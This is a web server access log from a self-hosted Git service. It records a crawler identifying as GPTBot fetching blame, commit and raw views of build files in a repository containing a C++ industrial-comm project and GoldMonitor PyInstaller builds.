"/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15120] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13468] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" -[17/Feb/2026:16:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17963] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14153] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11020] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10226] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11084] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70929] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12960] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" -[17/Feb/2026:16:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16389] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" -[17/Feb/2026:16:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11619] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp" -[17/Feb/2026:16:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 71207] [Gzip 17.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 71998] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10612] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" -[17/Feb/2026:16:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13546] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" -[17/Feb/2026:16:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:16:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 12909107] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:16:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10199] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:16:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:16:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:16:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:16:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:16:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10426] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 13193004] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:16:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 100826] [Gzip 29.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:16:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11046] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 99693] [Gzip 29.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:16:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10215] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 13192985] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:16:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17035] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10203] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 